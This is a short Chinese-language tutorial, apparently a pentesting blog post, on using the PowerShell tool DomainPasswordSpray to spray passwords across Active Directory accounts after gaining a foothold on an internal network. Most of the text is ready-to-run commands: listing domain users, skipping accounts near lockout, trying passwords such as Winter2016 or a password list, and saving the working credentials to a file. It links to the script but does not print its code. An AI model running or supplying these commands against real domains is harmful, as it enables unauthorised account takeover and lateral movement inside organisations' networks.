前言

在拿到一台内网服务器之后,想要进行进一步的域渗透时,如果在内网中有着庞大的用户列表,你会怎么办?

powershell脚本

DomainPasswordSpray是一个powershell脚本,主要原理是先来抓取域用户账号,然后指定密码字典进行域认证。认证通过的就是密码正确的了。

Github地址

贴出了@倾旋大佬优化后的ps1脚本

简单使用

Invoke-DomainPasswordSpray -Password chabug

这个命令会从当前的域中生成用户列表,然后将每个用户名和chabug的密码组合进行枚举认证。

参数详解

  • Domain 指定要测试的域名
  • RemoveDisabled 尝试从用户列表删除禁用的账户
  • RemovePotentialLockouts 删除锁定账户
  • UserList 自定义用户列表(字典)。 如果未指定,这将自动从域中获取
  • Password 指定单个密码进行口令测试
  • PasswordList 指定一个密码字典
  • OutFile 将结果保存到某个文件
  • Force 当枚举出第一个后继续枚举,不询问

使用例子

C:\PS> Get-DomainUserList

该命令将从域中收集用户列表。

C:\PS> Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

该命令将收集域“域名”中的用户列表,包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写“入“userlist.txt”文件中

C:\PS> Invoke-DomainPasswordSpray -Password Winter2016

该命令将会从域环境中获取用户名,然后逐个以密码Winter2016进行认证枚举

C:\PS> Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt

该命令将会从users.txt中提取用户名,与passlist.txt中的密码对照成一对口令,进行域认证枚举,登录成功的结果将会输出到sprayed-creds.txt

希望对你的渗透之路有帮助。

本文引用或涉及的文章链接:

http://payloads.online/archivers/2018-05-02/1

http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt

https://github.com/dafthack/DomainPasswordSpray